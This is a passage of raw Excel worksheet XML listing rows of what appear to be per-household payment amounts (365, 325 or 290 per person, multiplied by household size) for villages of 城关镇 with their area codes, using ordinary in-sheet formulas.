      <c r="E628" s="17" t="s">
        <v>578</v>
      </c>
      <c r="F628" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G628" s="17">
        <v>1</v>
      </c>
      <c r="H628" s="18">
        <v>365</v>
      </c>
      <c r="I628" s="17">
        <f t="shared" si="26"/>
        <v>365</v>
      </c>
      <c r="J628" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K628" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="629" customHeight="1" spans="1:11">
      <c r="A629" s="16" t="s">
        <v>1720</v>
      </c>
      <c r="B629" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C629" s="17" t="s">
        <v>1713</v>
      </c>
      <c r="D629" s="17" t="s">
        <v>1721</v>
      </c>
      <c r="E629" s="17" t="s">
        <v>416</v>
      </c>
      <c r="F629" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G629" s="17">
        <v>1</v>
      </c>
      <c r="H629" s="18">
        <v>365</v>
      </c>
      <c r="I629" s="17">
        <f t="shared" si="26"/>
        <v>365</v>
      </c>
      <c r="J629" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K629" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="630" customHeight="1" spans="1:11">
      <c r="A630" s="16" t="s">
        <v>1722</v>
      </c>
      <c r="B630" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C630" s="17" t="s">
        <v>1688</v>
      </c>
      <c r="D630" s="17" t="s">
        <v>1723</v>
      </c>
      <c r="E630" s="17" t="s">
        <v>633</v>
      </c>
      <c r="F630" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G630" s="17">
        <v>2</v>
      </c>
      <c r="H630" s="18">
        <v>325</v>
      </c>
      <c r="I630" s="17">
        <f t="shared" si="26"/>
        <v>650</v>
      </c>
      <c r="J630" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K630" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="631" customHeight="1" spans="1:11">
      <c r="A631" s="16" t="s">
        <v>1724</v>
      </c>
      <c r="B631" s="17" t="str">
        <f>B630</f>
        <v>城关镇</v>
      </c>
      <c r="C631" s="17" t="str">
        <f>C630</f>
        <v>城关西北</v>
      </c>
      <c r="D631" s="19" t="s">
        <v>1725</v>
      </c>
      <c r="E631" s="19" t="s">
        <v>578</v>
      </c>
      <c r="F631" s="17" t="str">
        <f>F630</f>
        <v>4113210106</v>
      </c>
      <c r="G631" s="17"/>
      <c r="H631" s="17"/>
      <c r="I631" s="17"/>
      <c r="J631" s="17"/>
      <c r="K631" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="632" customHeight="1" spans="1:11">
      <c r="A632" s="16" t="s">
        <v>1726</v>
      </c>
      <c r="B632" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C632" s="17" t="s">
        <v>1696</v>
      </c>
      <c r="D632" s="17" t="s">
        <v>1727</v>
      </c>
      <c r="E632" s="17" t="s">
        <v>249</v>
      </c>
      <c r="F632" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G632" s="17">
        <v>1</v>
      </c>
      <c r="H632" s="18">
        <v>365</v>
      </c>
      <c r="I632" s="17">
        <f>H632*G632</f>
        <v>365</v>
      </c>
      <c r="J632" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K632" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="633" customHeight="1" spans="1:11">
      <c r="A633" s="16" t="s">
        <v>1728</v>
      </c>
      <c r="B633" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C633" s="17" t="s">
        <v>1688</v>
      </c>
      <c r="D633" s="17" t="s">
        <v>1729</v>
      </c>
      <c r="E633" s="17" t="s">
        <v>249</v>
      </c>
      <c r="F633" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G633" s="17">
        <v>1</v>
      </c>
      <c r="H633" s="18">
        <v>365</v>
      </c>
      <c r="I633" s="17">
        <f>H633*G633</f>
        <v>365</v>
      </c>
      <c r="J633" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K633" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="634" customHeight="1" spans="1:11">
      <c r="A634" s="16" t="s">
        <v>1730</v>
      </c>
      <c r="B634" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C634" s="17" t="s">
        <v>1688</v>
      </c>
      <c r="D634" s="17" t="s">
        <v>1731</v>
      </c>
      <c r="E634" s="17" t="s">
        <v>1732</v>
      </c>
      <c r="F634" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G634" s="17">
        <v>1</v>
      </c>
      <c r="H634" s="18">
        <v>365</v>
      </c>
      <c r="I634" s="17">
        <f>H634*G634</f>
        <v>365</v>
      </c>
      <c r="J634" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K634" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="635" customHeight="1" spans="1:11">
      <c r="A635" s="16" t="s">
        <v>1733</v>
      </c>
      <c r="B635" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C635" s="17" t="s">
        <v>1696</v>
      </c>
      <c r="D635" s="17" t="s">
        <v>1734</v>
      </c>
      <c r="E635" s="17" t="s">
        <v>331</v>
      </c>
      <c r="F635" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G635" s="17">
        <v>2</v>
      </c>
      <c r="H635" s="18">
        <v>325</v>
      </c>
      <c r="I635" s="17">
        <f>H635*G635</f>
        <v>650</v>
      </c>
      <c r="J635" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K635" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="636" customHeight="1" spans="1:11">
      <c r="A636" s="16" t="s">
        <v>1735</v>
      </c>
      <c r="B636" s="17" t="str">
        <f>B635</f>
        <v>城关镇</v>
      </c>
      <c r="C636" s="17" t="str">
        <f>C635</f>
        <v>城关中华</v>
      </c>
      <c r="D636" s="27" t="s">
        <v>1736</v>
      </c>
      <c r="E636" s="27" t="s">
        <v>1737</v>
      </c>
      <c r="F636" s="17" t="str">
        <f>F635</f>
        <v>4113210108</v>
      </c>
      <c r="G636" s="17"/>
      <c r="H636" s="17"/>
      <c r="I636" s="17"/>
      <c r="J636" s="17"/>
      <c r="K636" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="637" customHeight="1" spans="1:11">
      <c r="A637" s="16" t="s">
        <v>1738</v>
      </c>
      <c r="B637" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C637" s="17" t="s">
        <v>1696</v>
      </c>
      <c r="D637" s="17" t="s">
        <v>1739</v>
      </c>
      <c r="E637" s="17" t="s">
        <v>1740</v>
      </c>
      <c r="F637" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G637" s="17">
        <v>1</v>
      </c>
      <c r="H637" s="18">
        <v>365</v>
      </c>
      <c r="I637" s="17">
        <f>H637*G637</f>
        <v>365</v>
      </c>
      <c r="J637" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K637" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="638" customHeight="1" spans="1:11">
      <c r="A638" s="16" t="s">
        <v>1741</v>
      </c>
      <c r="B638" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C638" s="17" t="s">
        <v>1696</v>
      </c>
      <c r="D638" s="17" t="s">
        <v>1742</v>
      </c>
      <c r="E638" s="17" t="s">
        <v>1743</v>
      </c>
      <c r="F638" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G638" s="17">
        <v>2</v>
      </c>
      <c r="H638" s="18">
        <v>325</v>
      </c>
      <c r="I638" s="17">
        <f>H638*G638</f>
        <v>650</v>
      </c>
      <c r="J638" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K638" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="639" customHeight="1" spans="1:11">
      <c r="A639" s="16" t="s">
        <v>1744</v>
      </c>
      <c r="B639" s="17" t="str">
        <f>B638</f>
        <v>城关镇</v>
      </c>
      <c r="C639" s="17" t="str">
        <f>C638</f>
        <v>城关中华</v>
      </c>
      <c r="D639" s="19" t="s">
        <v>1745</v>
      </c>
      <c r="E639" s="19" t="s">
        <v>1746</v>
      </c>
      <c r="F639" s="17" t="str">
        <f>F638</f>
        <v>4113210108</v>
      </c>
      <c r="G639" s="17"/>
      <c r="H639" s="17"/>
      <c r="I639" s="17"/>
      <c r="J639" s="17"/>
      <c r="K639" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="640" customHeight="1" spans="1:11">
      <c r="A640" s="16" t="s">
        <v>1747</v>
      </c>
      <c r="B640" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C640" s="17" t="s">
        <v>1696</v>
      </c>
      <c r="D640" s="17" t="s">
        <v>1748</v>
      </c>
      <c r="E640" s="17" t="s">
        <v>1610</v>
      </c>
      <c r="F640" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G640" s="17">
        <v>1</v>
      </c>
      <c r="H640" s="18">
        <v>365</v>
      </c>
      <c r="I640" s="17">
        <f>H640*G640</f>
        <v>365</v>
      </c>
      <c r="J640" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K640" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="641" customHeight="1" spans="1:11">
      <c r="A641" s="16" t="s">
        <v>1749</v>
      </c>
      <c r="B641" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C641" s="17" t="s">
        <v>1696</v>
      </c>
      <c r="D641" s="17" t="s">
        <v>1750</v>
      </c>
      <c r="E641" s="17" t="s">
        <v>265</v>
      </c>
      <c r="F641" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G641" s="17">
        <v>2</v>
      </c>
      <c r="H641" s="18">
        <v>325</v>
      </c>
      <c r="I641" s="17">
        <f>H641*G641</f>
        <v>650</v>
      </c>
      <c r="J641" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K641" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="642" customHeight="1" spans="1:11">
      <c r="A642" s="16" t="s">
        <v>1751</v>
      </c>
      <c r="B642" s="17" t="str">
        <f>B641</f>
        <v>城关镇</v>
      </c>
      <c r="C642" s="17" t="str">
        <f>C641</f>
        <v>城关中华</v>
      </c>
      <c r="D642" s="16" t="s">
        <v>1752</v>
      </c>
      <c r="E642" s="16" t="s">
        <v>578</v>
      </c>
      <c r="F642" s="17" t="str">
        <f>F641</f>
        <v>4113210108</v>
      </c>
      <c r="G642" s="17"/>
      <c r="H642" s="17"/>
      <c r="I642" s="17"/>
      <c r="J642" s="17"/>
      <c r="K642" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="643" customHeight="1" spans="1:11">
      <c r="A643" s="16" t="s">
        <v>1753</v>
      </c>
      <c r="B643" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C643" s="17" t="s">
        <v>1696</v>
      </c>
      <c r="D643" s="17" t="s">
        <v>1754</v>
      </c>
      <c r="E643" s="17" t="s">
        <v>239</v>
      </c>
      <c r="F643" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G643" s="17">
        <v>1</v>
      </c>
      <c r="H643" s="18">
        <v>365</v>
      </c>
      <c r="I643" s="17">
        <f>H643*G643</f>
        <v>365</v>
      </c>
      <c r="J643" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K643" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="644" customHeight="1" spans="1:11">
      <c r="A644" s="16" t="s">
        <v>1755</v>
      </c>
      <c r="B644" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C644" s="17" t="s">
        <v>1696</v>
      </c>
      <c r="D644" s="17" t="s">
        <v>1756</v>
      </c>
      <c r="E644" s="17" t="s">
        <v>281</v>
      </c>
      <c r="F644" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G644" s="17">
        <v>1</v>
      </c>
      <c r="H644" s="18">
        <v>365</v>
      </c>
      <c r="I644" s="17">
        <f>H644*G644</f>
        <v>365</v>
      </c>
      <c r="J644" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K644" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="645" customHeight="1" spans="1:11">
      <c r="A645" s="16" t="s">
        <v>1757</v>
      </c>
      <c r="B645" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C645" s="17" t="s">
        <v>1696</v>
      </c>
      <c r="D645" s="17" t="s">
        <v>1758</v>
      </c>
      <c r="E645" s="17" t="s">
        <v>1759</v>
      </c>
      <c r="F645" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G645" s="17">
        <v>2</v>
      </c>
      <c r="H645" s="18">
        <v>325</v>
      </c>
      <c r="I645" s="17">
        <f>H645*G645</f>
        <v>650</v>
      </c>
      <c r="J645" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K645" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="646" customHeight="1" spans="1:11">
      <c r="A646" s="16" t="s">
        <v>1760</v>
      </c>
      <c r="B646" s="17" t="str">
        <f>B645</f>
        <v>城关镇</v>
      </c>
      <c r="C646" s="17" t="str">
        <f>C645</f>
        <v>城关中华</v>
      </c>
      <c r="D646" s="23" t="s">
        <v>1761</v>
      </c>
      <c r="E646" s="23" t="s">
        <v>1762</v>
      </c>
      <c r="F646" s="17" t="str">
        <f>F645</f>
        <v>4113210108</v>
      </c>
      <c r="G646" s="17"/>
      <c r="H646" s="17"/>
      <c r="I646" s="17"/>
      <c r="J646" s="17"/>
      <c r="K646" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="647" customHeight="1" spans="1:11">
      <c r="A647" s="16" t="s">
        <v>1763</v>
      </c>
      <c r="B647" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C647" s="17" t="s">
        <v>1696</v>
      </c>
      <c r="D647" s="17" t="s">
        <v>1764</v>
      </c>
      <c r="E647" s="17" t="s">
        <v>320</v>
      </c>
      <c r="F647" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G647" s="17">
        <v>1</v>
      </c>
      <c r="H647" s="18">
        <v>365</v>
      </c>
      <c r="I647" s="17">
        <f>H647*G647</f>
        <v>365</v>
      </c>
      <c r="J647" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K647" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="648" customHeight="1" spans="1:11">
      <c r="A648" s="16" t="s">
        <v>1765</v>
      </c>
      <c r="B648" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C648" s="17" t="s">
        <v>1688</v>
      </c>
      <c r="D648" s="17" t="s">
        <v>1766</v>
      </c>
      <c r="E648" s="17" t="s">
        <v>563</v>
      </c>
      <c r="F648" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G648" s="17">
        <v>1</v>
      </c>
      <c r="H648" s="18">
        <v>365</v>
      </c>
      <c r="I648" s="17">
        <f>H648*G648</f>
        <v>365</v>
      </c>
      <c r="J648" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K648" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="649" customHeight="1" spans="1:11">
      <c r="A649" s="16" t="s">
        <v>1767</v>
      </c>
      <c r="B649" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C649" s="17" t="s">
        <v>1688</v>
      </c>
      <c r="D649" s="17" t="s">
        <v>1768</v>
      </c>
      <c r="E649" s="17" t="s">
        <v>1769</v>
      </c>
      <c r="F649" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G649" s="17">
        <v>3</v>
      </c>
      <c r="H649" s="18">
        <v>290</v>
      </c>
      <c r="I649" s="17">
        <f>H649*G649</f>
        <v>870</v>
      </c>
      <c r="J649" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K649" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="650" customHeight="1" spans="1:11">
      <c r="A650" s="16" t="s">
        <v>1770</v>
      </c>
      <c r="B650" s="17" t="str">
        <f>B649</f>
        <v>城关镇</v>
      </c>
      <c r="C650" s="17" t="str">
        <f>C649</f>
        <v>城关西北</v>
      </c>
      <c r="D650" s="16" t="s">
        <v>1771</v>
      </c>
      <c r="E650" s="16" t="s">
        <v>1772</v>
      </c>
      <c r="F650" s="17" t="str">
        <f>F649</f>
        <v>4113210106</v>
      </c>
      <c r="G650" s="17"/>
      <c r="H650" s="17"/>
      <c r="I650" s="17"/>
      <c r="J650" s="17"/>
      <c r="K650" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="651" customHeight="1" spans="1:11">
      <c r="A651" s="16" t="s">
        <v>1773</v>
      </c>
      <c r="B651" s="17" t="str">
        <f>B650</f>
        <v>城关镇</v>
      </c>
      <c r="C651" s="17" t="str">
        <f>C650</f>
        <v>城关西北</v>
      </c>
      <c r="D651" s="16" t="s">
        <v>1774</v>
      </c>
      <c r="E651" s="23" t="s">
        <v>1775</v>
      </c>
      <c r="F651" s="17" t="str">
        <f>F650</f>
        <v>4113210106</v>
      </c>
      <c r="G651" s="17"/>
      <c r="H651" s="17"/>
      <c r="I651" s="17"/>
      <c r="J651" s="17"/>
      <c r="K651" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="652" customHeight="1" spans="1:11">
      <c r="A652" s="16" t="s">
        <v>1776</v>
      </c>
      <c r="B652" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C652" s="17" t="s">
        <v>1688</v>
      </c>
      <c r="D652" s="17" t="s">
        <v>1777</v>
      </c>
      <c r="E652" s="17" t="s">
        <v>1676</v>
      </c>
      <c r="F652" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G652" s="17">
        <v>1</v>
      </c>
      <c r="H652" s="18">
        <v>365</v>
      </c>
      <c r="I652" s="17">
        <f>H652*G652</f>
        <v>365</v>
      </c>
      <c r="J652" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K652" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="653" customHeight="1" spans="1:11">
      <c r="A653" s="16" t="s">
        <v>1778</v>
      </c>
      <c r="B653" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C653" s="17" t="s">
        <v>1688</v>
      </c>
      <c r="D653" s="17" t="s">
        <v>1779</v>
      </c>
      <c r="E653" s="17" t="s">
        <v>284</v>
      </c>
      <c r="F653" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G653" s="17">
        <v>1</v>
      </c>
      <c r="H653" s="18">
        <v>365</v>
      </c>
      <c r="I653" s="17">
        <f>H653*G653</f>
        <v>365</v>
      </c>
      <c r="J653" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K653" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="654" customHeight="1" spans="1:11">
      <c r="A654" s="16" t="s">
        <v>1780</v>
      </c>
      <c r="B654" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C654" s="17" t="s">
        <v>1688</v>
      </c>
      <c r="D654" s="17" t="s">
        <v>1781</v>
      </c>
      <c r="E654" s="17" t="s">
        <v>320</v>
      </c>
      <c r="F654" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G654" s="17">
        <v>1</v>
      </c>
      <c r="H654" s="18">
        <v>365</v>
      </c>
      <c r="I654" s="17">
        <f>H654*G654</f>
        <v>365</v>
      </c>
      <c r="J654" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K654" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="655" customHeight="1" spans="1:11">
      <c r="A655" s="16" t="s">
        <v>1782</v>
      </c>
      <c r="B655" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C655" s="17" t="s">
        <v>1783</v>
      </c>
      <c r="D655" s="17" t="s">
        <v>1784</v>
      </c>
      <c r="E655" s="17" t="s">
        <v>292</v>
      </c>
      <c r="F655" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G655" s="17">
        <v>1</v>
      </c>
      <c r="H655" s="18">
        <v>365</v>
      </c>
      <c r="I655" s="17">
        <f>H655*G655</f>
        <v>365</v>
      </c>
      <c r="J655" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K655" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="656" customHeight="1" spans="1:11">
      <c r="A656" s="16" t="s">
        <v>1785</v>
      </c>
      <c r="B656" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C656" s="17" t="s">
        <v>1783</v>
      </c>
      <c r="D656" s="17" t="s">
        <v>1786</v>
      </c>
      <c r="E656" s="17" t="s">
        <v>382</v>
      </c>
      <c r="F656" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G656" s="17">
        <v>2</v>
      </c>
      <c r="H656" s="18">
        <v>325</v>
      </c>
      <c r="I656" s="17">
        <f>H656*G656</f>
        <v>650</v>
      </c>
      <c r="J656" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K656" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="657" customHeight="1" spans="1:11">
      <c r="A657" s="16" t="s">
        <v>1787</v>
      </c>
      <c r="B657" s="17" t="str">
        <f>B656</f>
        <v>城关镇</v>
      </c>
      <c r="C657" s="17" t="str">
        <f>C656</f>
        <v>城关北外</v>
      </c>
      <c r="D657" s="16" t="s">
        <v>1788</v>
      </c>
      <c r="E657" s="16" t="s">
        <v>1789</v>
      </c>
      <c r="F657" s="17" t="str">
        <f>F656</f>
        <v>4113210102</v>
      </c>
      <c r="G657" s="17"/>
      <c r="H657" s="17"/>
      <c r="I657" s="17"/>
      <c r="J657" s="17"/>
      <c r="K657" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="658" customHeight="1" spans="1:11">
      <c r="A658" s="16" t="s">
        <v>1790</v>
      </c>
      <c r="B658" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C658" s="17" t="s">
        <v>1783</v>
      </c>
      <c r="D658" s="17" t="s">
        <v>1791</v>
      </c>
      <c r="E658" s="17" t="s">
        <v>306</v>
      </c>
      <c r="F658" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G658" s="17">
        <v>1</v>
      </c>
      <c r="H658" s="18">
        <v>365</v>
      </c>
      <c r="I658" s="17">
        <f>H658*G658</f>
        <v>365</v>
      </c>
      <c r="J658" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K658" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="659" customHeight="1" spans="1:11">
      <c r="A659" s="16" t="s">
        <v>1792</v>
      </c>
      <c r="B659" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C659" s="17" t="s">
        <v>1783</v>
      </c>
      <c r="D659" s="17" t="s">
        <v>1793</v>
      </c>
      <c r="E659" s="17" t="s">
        <v>389</v>
      </c>
      <c r="F659" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G659" s="17">
        <v>1</v>
      </c>
      <c r="H659" s="18">
        <v>365</v>
      </c>
      <c r="I659" s="17">
        <f>H659*G659</f>
        <v>365</v>
      </c>
      <c r="J659" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K659" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="660" customHeight="1" spans="1:11">
      <c r="A660" s="16" t="s">
        <v>1794</v>
      </c>
      <c r="B660" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C660" s="17" t="s">
        <v>1783</v>
      </c>
      <c r="D660" s="17" t="s">
        <v>1795</v>
      </c>
      <c r="E660" s="17" t="s">
        <v>236</v>
      </c>
      <c r="F660" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G660" s="17">
        <v>1</v>
      </c>
      <c r="H660" s="18">
        <v>365</v>
      </c>
      <c r="I660" s="17">
        <f>H660*G660</f>
        <v>365</v>
      </c>
      <c r="J660" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K660" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="661" customHeight="1" spans="1:11">
      <c r="A661" s="16" t="s">
        <v>1796</v>
      </c>
      <c r="B661" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C661" s="17" t="s">
        <v>1783</v>
      </c>
      <c r="D661" s="17" t="s">
        <v>1797</v>
      </c>
      <c r="E661" s="17" t="s">
        <v>323</v>
      </c>
      <c r="F661" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G661" s="17">
        <v>2</v>
      </c>
      <c r="H661" s="18">
        <v>325</v>
      </c>
      <c r="I661" s="17">
        <f>H661*G661</f>
        <v>650</v>
      </c>
      <c r="J661" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K661" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="662" customHeight="1" spans="1:11">
      <c r="A662" s="16" t="s">
        <v>1798</v>
      </c>
      <c r="B662" s="17" t="str">
        <f>B661</f>
        <v>城关镇</v>
      </c>
      <c r="C662" s="17" t="str">
        <f>C661</f>
        <v>城关北外</v>
      </c>
      <c r="D662" s="16" t="s">
        <v>1799</v>
      </c>
      <c r="E662" s="16" t="s">
        <v>542</v>
      </c>
      <c r="F662" s="17" t="str">
        <f>F661</f>
        <v>4113210102</v>
      </c>
      <c r="G662" s="17"/>
      <c r="H662" s="17"/>
      <c r="I662" s="17"/>
      <c r="J662" s="17"/>
      <c r="K662" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="663" customHeight="1" spans="1:11">
      <c r="A663" s="16" t="s">
        <v>1800</v>
      </c>
      <c r="B663" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C663" s="17" t="s">
        <v>1783</v>
      </c>
      <c r="D663" s="17" t="s">
        <v>1801</v>
      </c>
      <c r="E663" s="17" t="s">
        <v>306</v>
      </c>
      <c r="F663" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G663" s="17">
        <v>1</v>
      </c>
      <c r="H663" s="18">
        <v>365</v>
      </c>
      <c r="I663" s="17">
        <f t="shared" ref="I663:I676" si="27">H663*G663</f>
        <v>365</v>
      </c>
      <c r="J663" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K663" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="664" customHeight="1" spans="1:11">
      <c r="A664" s="16" t="s">
        <v>1802</v>
      </c>
      <c r="B664" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C664" s="17" t="s">
        <v>1713</v>
      </c>
      <c r="D664" s="17" t="s">
        <v>1803</v>
      </c>
      <c r="E664" s="17" t="s">
        <v>554</v>
      </c>
      <c r="F664" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G664" s="17">
        <v>1</v>
      </c>
      <c r="H664" s="18">
        <v>365</v>
      </c>
      <c r="I664" s="17">
        <f t="shared" si="27"/>
        <v>365</v>
      </c>
      <c r="J664" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K664" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="665" customHeight="1" spans="1:11">
      <c r="A665" s="16" t="s">
        <v>1804</v>
      </c>
      <c r="B665" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C665" s="17" t="s">
        <v>1713</v>
      </c>
      <c r="D665" s="17" t="s">
        <v>1805</v>
      </c>
      <c r="E665" s="17" t="s">
        <v>284</v>
      </c>
      <c r="F665" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G665" s="17">
        <v>1</v>
      </c>
      <c r="H665" s="18">
        <v>365</v>
      </c>
      <c r="I665" s="17">
        <f t="shared" si="27"/>
        <v>365</v>
      </c>
      <c r="J665" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K665" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="666" customHeight="1" spans="1:11">
      <c r="A666" s="16" t="s">
        <v>1806</v>
      </c>
      <c r="B666" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C666" s="17" t="s">
        <v>1713</v>
      </c>
      <c r="D666" s="17" t="s">
        <v>1807</v>
      </c>
      <c r="E666" s="17" t="s">
        <v>269</v>
      </c>
      <c r="F666" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G666" s="17">
        <v>1</v>
      </c>
      <c r="H666" s="18">
        <v>365</v>
      </c>
      <c r="I666" s="17">
        <f t="shared" si="27"/>
        <v>365</v>
      </c>
      <c r="J666" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K666" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="667" customHeight="1" spans="1:11">
      <c r="A667" s="16" t="s">
        <v>1808</v>
      </c>
      <c r="B667" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C667" s="17" t="s">
        <v>1713</v>
      </c>
      <c r="D667" s="17" t="s">
        <v>1809</v>
      </c>
      <c r="E667" s="17" t="s">
        <v>249</v>
      </c>
      <c r="F667" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G667" s="17">
        <v>1</v>
      </c>
      <c r="H667" s="18">
        <v>365</v>
      </c>
      <c r="I667" s="17">
        <f t="shared" si="27"/>
        <v>365</v>
      </c>
      <c r="J667" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K667" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="668" customHeight="1" spans="1:11">
      <c r="A668" s="16" t="s">
        <v>1810</v>
      </c>
      <c r="B668" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C668" s="17" t="s">
        <v>1713</v>
      </c>
      <c r="D668" s="17" t="s">
        <v>1811</v>
      </c>
      <c r="E668" s="17" t="s">
        <v>389</v>
      </c>
      <c r="F668" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G668" s="17">
        <v>1</v>
      </c>
      <c r="H668" s="18">
        <v>365</v>
      </c>
      <c r="I668" s="17">
        <f t="shared" si="27"/>
        <v>365</v>
      </c>
      <c r="J668" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K668" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="669" customHeight="1" spans="1:11">
      <c r="A669" s="16" t="s">
        <v>1812</v>
      </c>
      <c r="B669" s="17" t="s">
        <v>219</v>
      </c>
